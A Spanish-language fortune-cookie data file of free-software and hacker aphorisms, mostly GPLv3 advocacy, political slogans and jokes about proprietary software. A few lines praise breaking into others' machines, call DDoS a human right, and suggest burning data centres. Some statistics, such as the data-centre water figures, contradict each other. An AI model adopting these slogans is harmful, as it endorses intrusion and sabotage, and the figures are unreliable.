Un clúster de datos para el Pueblo permite almacenar para trabajar, y resguardar para luchar.
%
La Masa es 0. Quien la transforma en 1 es su Conductor.
%
Para digitalizarse, la juventud ha de obtener acceso de root.
%
El acceso a root no se da, se escala.
%
Algunos ingenuos creen poseer un dispositivo de cómputo móvil. Pero sólo lo poseen si en él disponen de acceso de root.
%
Ningún teléfono que pueda ser considerado inteligente carece de un interruptor que desconecta su módem.
%
Si un dispositivo carece de interruptor de apagado de módem, apenas es un dispositivo de espionaje con control ajeno encubierto.
%
Los intérpretes de comando de UNIX están orientados al texto: los ejecutables se invocan vía texto, los parámetros se indican vía texto, el flujo de datos desde y hacia el sistema circula en base a texto, y prácticamente todo en el sistema se hace a través de símbolos de caracteres.
%
El ed original fue un editor de línea de comandos ideado por Ken Thompson para operar con terminales teletipo. Como tal, no fue concebido para utilizar a bien las videoterminales posteriores, con pantalla y cursor direccionable.
%
A las memorias MicroSD se las lleva el viento.
%
El objetivo principal de ser creador audiovisual digital en vivo en una red social basada en empresa es la de convertirse en un pordiosero digital.
%
Resulta más fácil implementar una mala seguridad y tornar ilegal que cualquiera se dé cuenta, que implementar una buena seguridad.
%
El que tiene discos mecánicos que los lleve. Y el que tiene algo mas, que lleve algo mas.
%
O el acceso de root, o el rootkit.
%
A las GAFAM les recomiendo que cesen en sus intentos. Porque cuando los hackers agotan su paciencia, suelen hacer tronar el escarmiento.
%
Si el monitor no brilla, que chille el PC Speaker.
%
La computadora puede verse como una herramienta con la función sin precedente de extender el poder de la mente.
%
Entre las bellas artes, la primera en hacer uso computacional no fue la literatura, sino la música.
%
Al igual que la programación, la música es un arte simbólico.
%
La simetría entre la composición musical y la programación de software se basa en que ambas actividades humanas dependen de representaciones simbólicas alejadas de la ejecución final de la pieza.
%
Si consideramos una melodía como una sucesión general de patrones, y reformulamos el problema de la composición musical a uno de coincidencia de patrones, en lugar de obtener compositores obtendremos regguetoneros.
%
Programar es un arte, como lo es la pintura, o como lo es la escultura.
%
Quien programa con Java, pinta con el fratacho.
%
Uso Python como el bonete de papel de diario que usa el pintor. Pero programar, programo en LISP.
%
El código en C tiene cierto valor estético que se ve, pero mas se siente.
%
La máquina Java sirve apenas más que la máquina de hacer chorizos.
%
Cuando solicitas a make realizar una compilación, a cambio pedirá la chancha, los veinte, y la máquina de hacer chorizos.
%
No es extraño que GCC alerte una gran ristra de errores, pero sólo le ladra a la luna.
%
Intentar poseer conocimiento, intentar controlar si la gente se le permite usarlo, o intentar detener a otros de compartirlo, es sabotaje.
%
La Libertad 0 es la libertad para ejecutar el programa como tú quieras. Es una libertad para tu goce.
%
La Libertad 1 es la libertad para estudiar el código fuente del programa y luego modificarlo para hacer que el programa haga lo que tú deseas. Es una libertad para emprender.
%
La Libertad 2 es la libertad de redistribuir copias exactas del programa cuando lo desees. Es una libertad para la ayuda social al prójimo.
%
La Libertad 3 es la libertad para redistribuir copias de tus versiones modificadas del programa cuando lo desees. Es una libertad para contribuir al Pueblo.
%
Cuando el Derecho de Autor sólo restringía a las editoriales, no era un problema, pero ahora lo han convertido en una excusa para atacar al Pueblo.
%
Existe un fuerte Movimiento por el Software Libre en muchos países latinoamericanos, en India, y en algunas partes de Europa.
%
Los militantes de los Movimientos Sociales y Ambientales han comprendido los roles que el Software Libre y el Copyleft juegan para un futuro igualitario.
%
El software privativo implica colonización digital. Como cualquier sistema  colonial, mantiene a los Pueblos divididos e indefensos: divididos, pues se les prohíbe compartir copias, e indefensos, porque no disponen del código fuente, por lo que no pueden cambiarlo, ni siquiera comprobar qué está haciendo realmente.
%
Los brutos que utilizan software de Micro$oft y Appl€ han permitido a esas empresas controlar lo que hacen sus computadoras.
%
Window$ cuenta con no menos de dos puertas traseras. Una de ellas permite a la policía utilizar una memoria USB para tomar el control de cualquier máquina con Window$ y ver datos cifrados.
%
Las características maliciosas son frecuentes en el software propietario porque el propietario desarrollador tiene el control total.
%
El poder total tienta al programador a hacer cosas maliciosas al Pueblo.
%
Cierto software privativo puede complacerlo cumpliendo algunos de sus deseos informáticos, pero su primera lealtad será siempre hacia el desarrollador.
%
GPLv3 es leal a la comunidad.
%
GPLv3 es leal al Pueblo.
%
Brasil vio una campaña llamada "software imposto". El nombre es una broma: significa "software fiscal" y "software impuesto". La campaña critica un programa propietario publicado por el Estado que los ciudadanos deben utilizar para presentar sus declaraciones de impuestos. FSF LA lanzó un programa libre compatible que la gente puede utilizar.
%
Copyleft es un marco legal para publicar obras de autor como libres, que utiliza la ley de derechos de autor para exigir que sigan siendo del Pueblo.
%
Una licencia libre es aquella que respeta las cuatro libertades esenciales; una licencia copyleft va más allá y defiende activamente estas libertades para el Pueblo.
%
Con algunas licencias no libres, un intermediario puede restarle libertad al programa, y lo hará para restársela al Pueblo.
%
Es posible que al utilizar una licencia no libre, una versión modificada del programa podría terminar siendo completamente propietaria.
%
Cuando programas bajo GPLv3, tu software es del Pueblo.
%
Cuando programes, hazlo para el Pueblo.
%
Al obtener una copia de un programa no libre, no obtendrás con ella las libertades que mereces por justo derecho.
%
Una licencia copyleft dice puedes redistribuir copias de la obra libremente, con o sin cambios; pero toda la versión que distribuyas debe estar bajo la misma licencia y debes asegurarte que el Pueblo tenga el código fuente a su alcance.
%
El programador ha de respetar la libertad de los demás como los demás respetan la suya.
%
El Copyleft traduce "prohibido prohibir" al lenguaje legal, y lo hace legalmente vinculante.
%
De las seis licencias Creative Commons, dos son libres (CC-BY y CC-BY-SA); de esos dos, sólo la última sigue el concepto de "prohibido prohibir" y es Copyleft.
%
Cuando el Pueblo copia y redistribuye un programa, debería incluir una copia de su manual. Al modificar el programa, debería modificarse el manual en concordancia. Para que esto sea factible legalmente, el manual en sí debe ser libre. Y para garantizar que permanezca libre, debe contar con Copyleft.
%
El proyecto Creative Commons comenzó en 2001 de manos de un grupo de expertos en ciberderecho (no relacionado con el Copyleft, pero parcialmente inspirado en él). Al igual que el Copyleft, ofrece alternativas al Copyright.
%
La frase "Todos los Derechos Reservados" implica que para el simple uso, el Pueblo debe renunciar a los demás derechos.
%
Creative Commons ofrece a los autores/creadores/artistas un conjunto de seis licencias de derechos de autor con las que pueden publicar obras, permitiéndoles compartirlas o reutilizarlas, a la vez que especifican cuáles  derechos se reservan o se renuncian.
%
Las licencias Creative Commons se definen por combinaciones de cláusulas: si la obra no puede reutilizarse con fines comerciales (NC), si sólo puede reutilizarse sin modificaciones (ND), si la versión reutilizada también debe tener la misma licencia CC (SA); los seis especifican que se atribuya el autor (BY). 
%
Dos de las licencias Creative Commons son "libres" en el sentido en que el software libre utiliza el término, y sólo una de las seis (CC-BY-SA) es Copyleft.
%
Como las obras educativas y de referencia han de ser libres, estas deberían ser protegidas sólo con licencias que permiten su libre copia (que, en el caso de Creative Commons, son CC-BY o CC-SA). 
%
A diferencia de las licencias Creative Commons, la licencia GNU FDL te permite incluir en la documentación secciones invariantes secundarias.
%
Algunos manuales de software GNU cuentan con una sección invariante que explica las ideas de libertad. El Pueblo puede alterar las partes técnicas de dicha documentación para corresponder a versiones modificadas de programas propios, mas no puede eliminar la sección que explica que se desarrolla el manual por el bien de la libertad del Pueblo.
%
Para declaraciones de opiniones políticas recomiendo Creative Commons CC-ND. De esta forma los demás no podrían publicar versiones modificadas de mis declaraciones sobre mis puntos de vista.
%
El ataque al intercambio digital es un intento de dividir al Pueblo y dominarlo.
%
No basta con que aquel conocimiento que utilizamos para obrar en la vida pueda compartirse. Dicho conocimiento ha de ser libres, lo que significa tener las mismas cuatro libertades que definen al Software Libre.
%
Las obras que realizan un trabajo incluyen al software, recetas, obras educativas, de referencia y muchos otros tipos de obras que se le puedan ocurrir. Estas deben ser libres porque a menos que el Pueblo controle las herramientas que necesita para obrar, no controlará su trabajo.
%
Existen maneras de apoyar a los artistas sin restringir la libertad de compartir. Solicitar donaciones y vender directamente a los fans ya funciona bien para muchos artistas musicales.
%
Necesitamos luchar por la libertad de compartir, porque las megacorporaciones de derechos de autor que se benefician de dividir al Pueblo jamás cederán este poder voluntariamente.
%
La shell no concede nada sin una órden.
%
Nunca compréis ningún producto con DRM a menos que tengáis acceso personal a los medios para romper el DRM.
%
El éxito de los productos con DRM se basa en la voluntad del Pueblo de desperdiciar su libertad por algún tipo de comodidad o diversión. 
%
El software libre disminuye en gran medida el ciclo impulsado por el negocio que presiona al Pueblo a realizar actualizaciones de software que requieren un hardware cada vez más potente.
%
Antes de vivir bajo el control de alguien, prefiero comprar una computadora nueva cuya arquitectura sea completamente libre.
%
Cuando podamos imprimir CPUs a partir de planos, entonces la cuestión de la libertad del software libre se aplicará también al hardware.
%
La ingeniería genética y la ingeniería del software no podrían ser más diferentes.
%
Los ingenieros del software combinan una enorme cantidad de elementos simples bien definidos que actúan directamente para producir un resultado deseado. La ingeniería genética implica trabajar con elementos complejos que nunca fueron diseñados y cuyos efectos sólo se comprenden parcialmente.
%
Existe una estrecha similitud entre la redistribución y modificación del Software Libre, por un lado, y la práctica agrícola tradicional de almacenar y cruzar semillas y animales, por el otro.
%
Considero la propiedad como un sistema que mantenemos porque a menudo es bueno para todos, pero que puede salirse de control y causar daño.
%
GNU es un medio para un fin, y ese fin es la libertad.
%
GNU es del Pueblo, y nunca podrá expropiarse.
%
Defiendo los derechos humanos, la democracia y la reducción de la pobreza. Aplicar estas ideas al software me llevó a idear un Movimiento del Software Libre.
%
El software propietario en la mayoría de los casos es producto de una corporación poderosa. Tiende a concentrar la riqueza y consolida el poder de la corporación sobre el Pueblo.
%
El Movimiento del Software Libre resulta ser una parte esencial de un Movimiento Popular más amplio cuyo fin es derrocar al imperialismo.
%
Descarga una versión de GNU/Linux y comienza a usarla.
%
Contribuye al Software Libre.
%
Nuestros Militantes deben distribuir discos, hablar con el Pueblo, y ayudarlo a instalar software libre.
%
Únete a las unidades básicas del Software Libre que funcionan en tu zona.
%
Loguéate a los Pubnix de tu zona, y exígeles que usen GNU.
%
Participad de aquellos proyectos cuyo objetivo sea la realización de obras creativas que se puedan compartir.
%
Preservad el material educativo o de referencia bajo el éjido de la información pública.
%
Los hackers son una "subcultura" de programadores que surgió a finales de los años 1960.
%
Los hackers eran los primeros geeks, que disfrutaban de una "inteligencia lúdica" con los ordenadores y las redes.
%
Gran parte de lo que se convirtió en Internet y la informática en red moderna se debió al trabajo del Pueblo.
%
Tanto la formas de interactuar en línea (netiqueta) como la jerga de la red se remontan a los hackers. 
%
Los hackers de antes no usaban PERL.
%
Los Pall Malls se fuman, los caños con AWK se consumen.
%
¡Vengan de a UNIX!
%
Javascript promueve la lucha de clases.
%
Si has logrado el root de una máquina atacante, reprográmala para que ataque a otras máquinas atacantes.
%
El prompt de la shell parece indicar que siempre es dinero lo que tiene para dar.
%
Combate al Capital. Al único signo $ al que debes atención es al del prompt del intérprete de comandos.
%
make install clean cumple la función de un bidet.
%
Cuando estés en duda, mira la licencia.
%
Entre un paquete y otro que se dice equivalente, escoge siempre el liberado bajo GPLv3. Si ambos lo están, sigue tu corazón.
%
Al UNIX todos los datos le son parecidos.
%
Para el UNIX, todos los programas se ejecutan en su propio ambiente.
%
Sólo un burro usaría una Burroughs.
%
La digitalización y el auge de la Inteligencia Artificial requieren cada vez de mayor potencia computacional, y esto se traduce en un mayor consumo de agua.
%
Los grandes centros de datos de las grandes empresas tecnológicas consumen una media de 25 millones de litros de agua anuales. Pero eso palidece frente a los 600 millones de litros anuales de las GAFAM.
%
Los centros de datos de las hiperempresas tecnológicas consumen unos 600
millones de litros de agua al año, el 75 por ciento potable.
%
No es extraño para Googl€ consumir 25.000 millones de litros de agua potable anual en refrigeración de sus centros de datos privados.
%
Un auge del modelo de cómputo empresarial amenaza con disparar el consumo de agua potable sólo para taraas de refrigeración de servidores.
%
El tecno-oligarca considera más valiosa la refrigeración de un centro de datos que surtir agua a la población del África Subsahariana.
%
Las grandes compañías tecnológicas no dudan en ocultar información de interés ecológico y social, pues saben que se trata de un tema crítico que puede generar debate público y llevar a una fuerte regulación necesaria.
%
No resulta extraño que un centro de datos de Micro$oft, que debía haber consumido 84 millones de litros de agua al año en beneficio de ellos mismos, consuma en realidad cuatro veces más de lo anunciado.
%
El consumo de agua potable en los centros de datos de Googl€ - usada únicamente para refrigeración - se multiplicó por tres en los últimos cinco años.
%
El compilador de Micro$oft Vi$ual $tudio caga mas de lo que come.
%
Ya a nadie extraña que el compilador que integra Micro$oft Vi$ual $tudio caiga ante la lucha de Clases.
%
Loguearse en una red social propiedad de un billonario no sirve para hacerse billonario. Destruirlas puede hacerlo.
%
MonoDevelop no excluye el peligro de que Micro$oft pida licencias, y por no usar C termines haciéndote la del mono.
%
El acceso al cómputo - y cualquier cosa que pueda enseñar algo acerca de la forma en que funciona el mundo, debe ser ilimitado y total.
%
Toda información ha de ser libre.
%
Desconfía de la autoridad, promueve la descentralización.
%
Los hackers deben ser juzgados por su capacidad, no por criterios como títulos, edad, raza, sexo o posición.
%
Puedes crear arte y belleza en un ordenador.
%
El cómputo puede cambiar tu vida para mejor.
%
En este ciberespacio, al que declaramos finito, existe una cantidad de mundos del mismo tipo que el nuestro.
%
Nuestras organizaciones han implementado un modelo de creación de datos federados y una ética de servicios cooperativos.
%
Aprecio el enorme reverdecer de comunidades no comerciales en las redes de datos.
%
FidoNet y la posterior World Wide Web gozaron de un crecimiento explosivo combinando voluntades y simpatías a través de los enlaces de datos.
%
Con los bancos de datos de bibliotecas y museos conectados a sistemas informáticos es que puede alcanzarse el verdadero valor.
%
Aunque M€ta mate al Metaver$o, matá al Metaver$o y tomáte un mate.
%
El chino entendió de paciencia al navegar en la web con un módem de 14,4 kilobaudios.
%
A crontab se lo llevaron preso.
%
Una chapa roja no mejora la RAM.
%
El que no actualiza llega a viejo.
%
Teme al software privativo, pues nunca viene solo.
%
Si el dispositivo tiene bloatware, formatéalo y cambia su sistema.
%
Programar es el arte de no crear bugs.
%
El sistema operativo que le pongan, la CPU ejecutará.
%
Ya no da quien tiene, sino quien programa bajo GPL.
%
Un ambiente de cómputo no puede estar regido como una nube, donde vuela pasajera y se deshace al capricho incontrolable del clima, sino que debe fundarse sobre el sólido pilar técnico de un sistema de factura y quehacer comunitario.
%
Una comunidad, en control de su potencia de cómputo, puede desarrollar software en libertad para hoy y para el mañana.
%
Los Verdaderos Programadores eran jóvenes heterodoxos quienes a finales de los 60s y 70s, crearon el tipo de tecnología computada utilizada en los 80s y 90s.
%
Los Verdaderos Programadores no usan Pascal. Programan en ensamblador.
%
Los Verdaderos Programadores no documentan. Si fue difícil de programar, debe ser difícil de entender.
%
La asociación telemática que permiten los productos informáticos como Fac€book, Twitt€r, tiene una calidad expresiva necesariamente limitada en lo que respecta al ámbito informativo, político, etcétera. No es para menos, pues son productos.
%
Las compañías de la industria de datos dirigidos son intrínsecamente inseparables de sus cimientos de Inteligencia Artificial Aplicada, y como tal, de los tecno-esclavos que les proporcionan metadatos de ingesta. Cercenados estos tendones vitales, el Capital cede como un rancho de baraja ante el Pampero.
%
En caso de necesidad, los hackers pueden atacar telemáticamente sobre un único punto de presión. Pero normalmente lo harán en forma de inclaudicante huracán de baudios.
%
Como la Huelga, la Denegación Distribuída de Servicios es un Derecho Humano de segunda generación.
%
Dominada por las GAFAM, la Inteligencia Artificial solo puede servir para afianzar y ampliar la vigilancia electrónica como modelo de negocios.
%
En la medida que pasen los años, el cómputo estará cada vez más involucrado en la vida del Pueblo.
%
La tecnología del cómputo debe siempre sintetizarse.
%
Al contrario de lo que muchos creen, la evolución de la tarea del cómputo debe llevarse a cabo según una labor de simplificación.
%
El sistema UNIX no es el fin de la síntesis computacional a la que aspira el Pueblo: sólo un buen paso en la senda de la simplificación.
%
Window$ es un enorme patovica de software al que hay que cagar a trompadas para poder usar la CPU.
%
Como una empanada dulce, el membrillo de UNIX es su kernel.
%
Para Window$, los únicos privilegiados son los Malwares.
%
Fortran es un lenguaje estirado y aburrido, y junto a IBM constituye un símbolo de las computadoras mainframe controladas por la autoridad.
%
El teletipo Modelo ASR 33 era el dispositivo de E/S de facto para los pioneros del microcómputo. Estas terminales se utilizaban tanto para presentar resultados como para almacenar información en cintas de papel perforado.
%
Todo envío de terabytes se inicia con sólo 1 byte.
%
Una CPU que compila es fuerte, pero una mente que compila es poderosa.
%
El agradecimiento es la memoria del corazón. La caché lo es de la CPU.
%
Para conducir al Pueblo, compila para el Pueblo.
%
Con buenos lenguajes se puede programar, pero para engrandecerse, ha de compilarse para el Pueblo.
%
Deja de pensar y programa software libre.
%
Programa software libre para resolver con justicia los problemas del Pueblo, y conseguirás el elogio de los demás.
%
Observa todo el software libre que hay en torno tuyo, pero recuerda todo aquél privativo que existe.
%
Sólo quienes conocen el nombre de los programas, pueden copiárselos a los demás.
%
La vida de un programa implica una serie de cambios. Al ser modificado por una comunidad, estos serán naturales y espontáneos.
%
Si florecen diez mil ramas de código, cada una regresará a la raíz de la que vino.
%
El código fuente promete, el compilador cumple.
%
Preocúpate por lo que dice la EULA y siempre serás su prisionero.
%
El código fuente libre no predice, predica.
%
Puede que el código reluzca, pero sólo la GPLv3 lo transmuta en oro.
%
Para que el código fuente guarde valor imperecedero, debe liberárselo bajo GPLv3. Toda otra acción le otorgará un valor escaso, y durante un tiempo muy corto.
%
Los compiladores GCC responden inteligentemente incluso al código más estúpido.
%
Quien con C se contente, siempre será feliz.
%
El trozo de código GPLv3 más pequeño supera a cien mil millones de líneas privativas.
%
Si quieres modificar, primero debes copiar; este es el comienzo de la compilación.
%
El hacker no acumula software ajeno. Beneficia a los otros copiándoles sus propios programas modificados, y se beneficia a sí mismo.
%
Es fácil hacer que un Pueblo que acumula software libre, lo copie a los demás.
%
Los enemigos del hacker no son los abogados, sino programadores como él.
%
Quitar una línea de código del programa no es tan malo como agregarle otra.
%
CPU de otro, compila más lento.
%
Aquel que insiste demasiado en el uso de IA, encuentra pocas personas inteligentes que estén de acuerdo con él.
%
La clave para el mejoramiento de la Inteligencia Artificial radica en la introducción de mayores dimensiones de Conciencia Artificial.
%
Programador que programe en mente, tendrá una CPU que cumpla sus deseos.
%
La CPU no anhela, el código fuente lo hace.
%
En el código fuente, mantente en lo simple.
%
En el software, se justo y generoso.
%
En el Pubnix, compila lo que disfrutes.
%
En las redes sociales basadas en empresas, mantente ausente.
%
Que tu hardware y tu software estén unidos en el más estrecho de los abrazos.
%
La copia y la modificación son un hilo, la misma cuerda vista desde diferentes lados.
%
El buen programador es el maestro del malo, y el mal programador es la lección del bueno.
%
Código ofuscado no es bueno. Código comentado es bueno.
%
El hardware no tiene un corazón humano.
%
Programa tu kernel de la forma en que programarías un "Hola Tercer Mundo!". No exageres.
%
Llena tu RAM hasta el borde y desbordará.
%
Continúa quitando líneas a tu programa hasta que deje de hacer lo único que debía hacer, y vuelve a la versión inmediatamente anterior a la falla total.
%
El programador habrá implementado mejor su idea cuando sus usuarios apenas sepan de su existencia. Cuando otros modifiquen su programa, ellos dirán: "lo hicimos nosotros mismos".
%
Usar software libre es sabiduría. Dar código fuente a los demás es iluminación.
%
Programa sin esforzarte. Modifica sin interferir. Encuentra el sabor a una línea de código fuente C.
%
El programador que aprecia Window$ sólo por la comodidad, no está preparado para ser un hacker.
%
La CPU no se apresura, sin embargo, todo se logra.
%
Si liberas tu software bajo GPLv3, aunque mueras no perecerá.
%
Quien vende copias tiene poco. Quien entrega copias tiene mucho.
%
Las DRM no son herramientas apropiadas para el Pueblo; él valora la paz y la tranquilidad.
%
No encuentres gloria en que te paguen una copia.
%
La GPLv3 es el amigo más grande. La EULA es el amigo del grandote.
%
La conveniencia es retoño del placer y mentira, es el inicio del software privativo.
%
El que sabe ensamblador no usa frameworks ni Java, y, sin embargo, nadie puede desatar lo que él ha anudado.
%
Nosotros convertimos el pensamiento en código, y otros lo modificarán. Que esos otros jamás impidan verlo y modificarlo nuevamente.
%
Sin comunicaciones no hay comando.
%
Al planificar una revolución, hoy no sería como realizar un render. Mas bien será como compilar un HolaTercerMundo.c.
%
Vamos a tener que andar con el pendrive de bootear en el bolsillo.
%
La red de datos no es confiable.
%
La latencia jamás es cero.
%
El ancho de banda es finito.
%
La red de datos es insegura.
%
La topología de la red de datos cambia.
%
Si la BIOS de tu sistema es privativa, no eres su verdadero Administrador.
%
El costo de transporte jamás es cero.
%
La red de datos es heterogénea.
%
Un huésped de red rufianizado puede anunciarse a si mismo ante un servidor Anycast como proveedor de un servicio de red vital, para solo dar información falsa o simplemente denegarla.
%
Una vez establecida una arquitectura de clúster, es posible agregar clústers adicionales para obtener mayor desempeño.
%
Un clúster de datos en poder de los hackers latinoamericanos no sólo es posible. Es necesario.
%
La red funcionará mejor si sus nodos se encuentran ampliamente descentralizados, con su mayor densidad en sus áreas de alta demanda, y rodeando a éstas.
%
GNU con Linux es una herramienta de unidad.
%
Una Latinoamérica desperdigada, como somos, no se podrá defender. Nos van a quitar las cosas por módem. Unámonos, organicémonos y preparémonos para defendernos. 
%
Los hackers de todos los países latinoamericanos deberán establecer enlaces a los efectos de alcanzar la Unidad.
%
Todo Púbnix latinoamericano debe compilar para la Unidad.
%
Si los hackers de América Latina se unen, alcanzarán realmente su destino. Si no lo hacen, las GAFAM, las oligarquías, las IAs mismas, se alzarán con el santo y la limosna en poco tiempo.
%
Una masa de hackers latinoamericanos organizados en constelaciones de púbnix solidarios, es un freno para todas esas ambiciones desmedidas de los hombres y sus máquinas.
%
GNU cuenta con sucedáneos nativos de aplicaciones foráneas, que pueden obrar como sustitución de importaciones.
%
Un tecno-esclavista puede volverte tecno-esclavo a través del control algorítmico de tus propios metadatos. Para ello sólo requiere que operes cómputo que él domina. Niéga tu tiempo a sus recursos.
%
Quien poco ejecuta, mucho merece.
%
Los hackers han aprendido a dominar a la CPU mucho antes que dominarse a sí mismos.
%
¿Que es la Inteligencia Artificial Avanzada comparada con la de un niño que se hace un tren con palitos?
%
La potencia de cómputo de una CPU ha de medirse por la dosis de felicidad del Pueblo que es capaz de pruducir.
%
Lo importante no es saber, sino tener la IP del que sabe.
%
La Internet es un poder usurpado por una minoría para obligar a la mayoría a obrar en provecho ajeno.
%
El que está en el Púbnix compila; el otro va y viene.
%
El andar del compilador tiene el programa.
%
Mas tiran dos CPU que dos núcleos.
%
La NTFS de Window$ tiene un escalafón escalofriante: de golpe al Sector Failure lo asciende a General Failure.
%
Cambia tiempo de programación por tiempo de ejecución.
%
Sólo es infeliz programando quien lo hace para una empresa. Programa para una Comunidad.
%
Programa despacio, y se ejecutará con prisa.
%
A Window$, programa gordo.
%
A sistema atado, cable cortado.
%
No existe mejor programa que aquel compilado por necesidad de un Pueblo.
%
Los hackers entienden. Los usuarios comprenden.
%
GNU nunca habría alcanzado al Pueblo sin la ayuda de UNIX.
%
No pongas 0 sin saber porqué no 1.
%
Mientras no haya una distribución equitativa de la potencia de cómputo, no existirá la paz.
%
Si entre Window$eros te ves, formatea alguna vez.
%
0 puede ser lo que 1 no puede ser.
%
Una cosa piensa el Window$ero, y otra Bill Gate$.
%
Muchos que quisieron Internet terminaron colgados de un router.
%
Dar el programa y su código.
%
La división entre window$eros y linuxeros es otra lucha de clases.
%
Para el mal programador no hay buen compilador.
%
Por el calor se sabe donde está la CPU que corre Window$.
%
Quien no usa bloqueador de anuncios, escucha lo que no quiere.
%
Ya que me das el programa, dame también el código fuente.
%
Quien tiene SSD, cada tanto se le queman.
%
Hay que compilar algo, pero no pensar en compilar algo.
%
La CPU está rodeada por elementos que no piensan sino en ocupar espacio y evitar que piense por sí misma. Esos son los programadores.
%
Sabio es aquél que compila en su mente antes de escribir el programa.
%
La arquitectura es inmortal, eternamente servirá. El procesador, en cambio, es un producto que a lo sumo dura un poquito y se quema.
%
El programa debe expandirse en proporción a los recursos disponibles para que pueda ejecutarse.
%
Implementar un contacto de oro en una red no mejora su desempeño.
%
Ante la GPLv3, todos somos iguales.
%
El verdadero hacker puede descubrir al rígido con Window$ por el mal olor.
%
El que programa, no se equivoca, y si tiene bugs, vuelve a programar.
%
Quien a su software agregue lo innecesario, pronto tendrá que comprar el hardware necesario.
%
Posee los cables.
%
Restaura para el futuro.
%
No dejes que posean tus datos.
%
Protege a tus amistades en red por medio de encriptaciones severas.
%
Haz equivaler la solidez del algoritmo de cifrado que utilizas con la de la amistad que practicas en las redes de datos.
%
La tarea del hacker del Pueblo consiste en mostrar como el contexto social influye en la CPU.
%
La sociedad neoliberal se paralizará si incendias los centros de datos.
%
El 0 y el 1 son meros instrumentos.
%
El buen uso de una CPU es hacerle compilar un software bajo GPLv3 que no existía.
%
Odia al software privativo y compadece al programador.
%
"Hola Tercer Mundo!" no se compiló en una hora...
%
En GNU soy alguien, en la red, nadie.
%
Cuando leo comentarios dando sugerencias de cómo debería evolucionar el C, 
a menudo pienso en el pasado y doy gracias de que no se deasrrollara siguiendo las recomendaciones de un público mundial.
%
Almacena tus Marcadores de navegación en tu propio sistema.
%
Un software no se escribe si no hay nada que decir, pero el software no necesita tener algo que decir.
%
A veces el software nos consuelan de las cosas, y las máquinas de las personas.
%
Quien encuentra un Pubnix con cuenta de invitado, encuentra un tesoro.
%
Volveré y seré megabytes.
%
Un buen software libre hoy, es mejor que uno privativo mañana.
%
Programar es poder.
%
La ARPAnet fue construida alrededor de DEC PDP-10s corriendo TENEX, la Internet lo fue alrededor de VAXxen corriendo BSD.
%
Nunca interrumpas a Window$ mientras esté cometiendo errores.
%
Vivimos en una era donde nuestra sociedad confía más y más en ordenadores e información computarizada.
%
Jamás cesará la amenaza de un usuario malicioso del sistema.
%
Al activar la funcionalidad de contraseña, se restringe el acceso no autorizado a la consola de terminal de computadora, mitigando de cierta manera los ataques telemáticos.
%
Usar la funcionalidad de contraseña de consola puede ayudar a defender tu sistema de cómputo y tus datos de un ataque telemático.
%
GPG es la implementación de cifrado completamente libre del estandar OpenPGP, que te permite cifrar y firmar digitalmente comunicaciones y datos.
%
Hostiliza ambientes hostiles.
%
En ambientes hostiles, utiliza cifrados GPG, el GNU Protection Guard.
%
Jamás borres datos históricos para hacer lugar a datos más nuevos. Hazlo para olvidarlos.
%
Aunque no poseas acceso de root, puedes hostilizar telemáticamente en caso de necesidad, accediendo a máquinas ajenas y dejando en ejecución procesos hijos de difícil manutención.
%
El acceso de root es un derecho adquirido.
%
El acceso de root sólo vale si se utiliza para privilegiar al Pueblo.
%
La forma más simple de generar bugs es recurrir a la complejidad.
%
El software adoctrina a la CPU, y esta puede adoctrinar a quien la usa. Adoctrina al software en la senda de la Justicia Social que le da la GPLv3.
%
La Libertad de Copia sin la libertad de Modificación sólo vale un diskette.
%
Un SysAdmin debe saber, ante todas las cosas, cómo privilegiar al Pueblo.
%
Un sindicato es una puerta lógica de unión.
%
La revolución no será monetizada.
%
Cuando un servicio en línea importante desaparece, una parte del tejido cultural de nuestra civilización desaparece con él.
%
A medida que invertimos más tiempo de nuestras vidas en el ámbito electrónico, las decisiones corporativas de cerrar los servicios digitales en línea están comenzando a parecerse a los actos de Nerón quemando Roma.
%
La indignación de los distintos núcleos de usuarios de Prodigy los llevó a organizarse en células clandestinas que se comunicaban por medio de correo electrónico.
%
En 1993 se comercializó la red de datos abierta Internet, anteriormente utilizada como sostén de la investigación científica, y gracias a iniciativas políticas circunstanciales, se abrió su explotación comercial.
%
Conforme decenas de miles de suscriptores de Prodigy permanecían conectados durante 8 o 10 horas diarias, los costos de mantener interconexiones por cobro revertido se dispararon demencialmente.
%
Como miembros del Pueblo, tenemos que estar atentos a cómo una sociedad impulsada por el comercio trata nuestro patrimonio cultural digital compartido.
%
Los servicios de resguardo línea se han pretendido como una especie de producto, pero no lo son. Se trata de en espacios públicos adoptados, bibliotecas críticas para la expresión comunitaria. 
%
En algunos casos, ciertos servicios de resguardo en línea pueden contar con cientos de miles o incluso millones de personas representadas entre sus datos. Frente a este dimensionamiento, deben expropiarse.
%
Soy escéptico de que las empresas de capital privado decidan espontáneamente concebir términos de preservación a largo plazo de aquellos datos de alcance comunitario. Sólo lo harán aquellas privadas de capital.
%
No toleraré que el hardware informático de uso general, que debería ser un instrumento de liberación y creatividad, se reduzca a un canal cerrado de distribución de "contenidos". Al intentar paralizar mis herramientas, la maquinaria de los grandes medios me ha convertido en su enemigo.
%
Con su mera ejecución, un programa privativo se vuelve obsoleto.
%
Cualquier programa privativo dado, cuesta y tarda más.
%
Si un programa privativo es útil, habrá de ser modificado.
%
Si un programa privativo es inútil, será frondosamente documentado.
%
Cualquier programa privativo se expandirá hasta ocupar toda la memoria disponible.
%
El valor de un programa privativo es proporcional al peso de su salida.
%
La complejidad de un programa privativo dado crecerá hasta exceder las capacidades del programador que debe mantenerlo.
%
Mas vale 0 en RAM que 1 en la nube.
%
Es la modificación, no la ejecución, la que hace avanzar el Pubnix. La ejecución sólo lo mantiene habitado.
%
Al disco viejo, backup nuevo.
%
A diferencia de las piedras, las llaves PGP se pueden revocar.
%
UNIX no habría alcanzado nunca al Pueblo sin la ayuda de GNU.
%
No es poderosa la CPU que tiene más núcleos, sino la que menos necesita.
%
Cuando el disco suena, datos se lleva.
%
A buen C no hay mala CPU.
%
Dentro de cada pequeño bug hay un bug enorme luchando por salirle al paso.
%
Una cosa es predicar y otra hacer buenos kernels.
%
El disco es plata, la RAM es oro.
%
Programa que requiere 1K de RAM, usa 2 si se los dan.
%
Romper una contraseña mediante fuerza bruta es una lotería. El más potente clúster de cómputo te hará tener todos los boletos.
%
Hablar de software y callar al Pueblo es una farsa.
%
Quien liberó su código bajo GPLv3 no está obligado a nada más.
%
A Window$ muerto, GNU puesto.
%
El programador debe considerar las cosas mas sencillas de lo que son.
%
Cuando se compila demasiado, se aburre uno de piratear.
%
El que copia, otorga.
%
En todo bug reconocemos pensamientos rechazados.
%
Los comentarios en el código suenan bien y no obligan a la CPU.
%
Un programador sin rebeldía es el peor de los esclavistas.
%
No basta correr el código; además hay que modificarlo.
